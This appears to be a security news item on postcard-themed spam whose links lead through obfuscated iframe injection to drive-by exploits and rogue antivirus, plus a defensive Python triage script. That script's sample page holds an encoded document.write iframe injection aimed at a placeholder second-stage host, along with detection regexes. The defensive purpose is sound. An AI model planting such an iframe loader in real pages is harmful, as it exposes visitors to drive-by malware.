“You’ve got a postcard” spam emails lead to fake AV

Easter has come and passed, but the threat of bogus e-cards is as alive as it ever was.

This particular method of luring users to malicious pages or to download malicious attachments has been around for ages, and the fact that it is still used proves that it is effective enough for spammers to bother with it.

Websense warns about pretty generic spam emails bearing the “You’ve got a postcard” subject and urging the recipient to follow the offered link in order to view it “at anytime within the next 20 days.”

“The URLs used in the emails are either compromised sites or were only created barely two weeks ago,” they say. Clicking on the link takes the user to a site containing obfuscated code that creates an iframe containing another URL.

This second URL contains an obfuscated script that drops some exploit code in order to run a rogue AV on the victim’s machine.

The biggest danger here is the fact that the recipient doesn’t have to do anything other than follow the offered link in order for his computer to get compromised – he doesn’t have to confirm the download of an executable camouflaged as an innocuous file or anything else.
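The chain described above (lure email, landing page, script-written iframe) can be triaged statically on the defender's side. This is an added example, not code from Websense or from the campaign. The obfuscation style it decodes (percent-encoding or String.fromCharCode), the sample message, the sample page and all hostnames are constructed assumptions.

```python
import re
from email import message_from_string
from urllib.parse import unquote

LURE_SUBJECT = re.compile(r"you['\u2019]ve got a postcard", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")

# Constructed sample message and landing page (not captured from the campaign).
SAMPLE_EMAIL = (
    "From: postcards@sender.example.invalid\n"
    "Subject: You've got a postcard\n\n"
    "View it at anytime within the next 20 days:\n"
    "http://landing.example.invalid/card.html\n"
)
SAMPLE_PAGE = (
    "<html><body><p>Loading your postcard...</p><script>"
    "document.write(unescape('%3Ciframe%20src%3D%22http%3A//"
    "second-stage.example.invalid/in.php%22%3E%3C/iframe%3E'));"
    "</script></body></html>"
)

def triage_email(raw):
    """Flag the lure subject and list the links a mail gateway should check."""
    msg = message_from_string(raw)
    parts = [p for p in msg.walk() if not p.is_multipart()]
    body = "\n".join((p.get_payload(decode=True) or b"").decode("utf-8", "replace")
                     for p in parts)
    return {"lure": bool(LURE_SUBJECT.search(msg.get("Subject", ""))),
            "urls": URL_RE.findall(body)}

def _decode_layer(script):
    """Undo one layer of fromCharCode and percent-encoding without running the script."""
    def chars(m):
        nums = [int(n) for n in m.group(1).split(",") if n.strip()]
        return "".join(chr(n) for n in nums if n < 0x110000)
    return unquote(CHARCODE_RE.sub(chars, script))

def script_generated_iframes(html):
    """Return iframe targets that appear only inside (decoded) script text."""
    static = set(IFRAME_SRC_RE.findall(SCRIPT_RE.sub("", html)))
    found = []
    for script in SCRIPT_RE.findall(html):
        for src in IFRAME_SRC_RE.findall(_decode_layer(script)):
            if src not in static and src not in found:
                found.append(src)
    return found
```

Only one decoding layer is handled; an empty result on a page from a flagged message means the page needs sandboxed analysis, not that it is clean.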
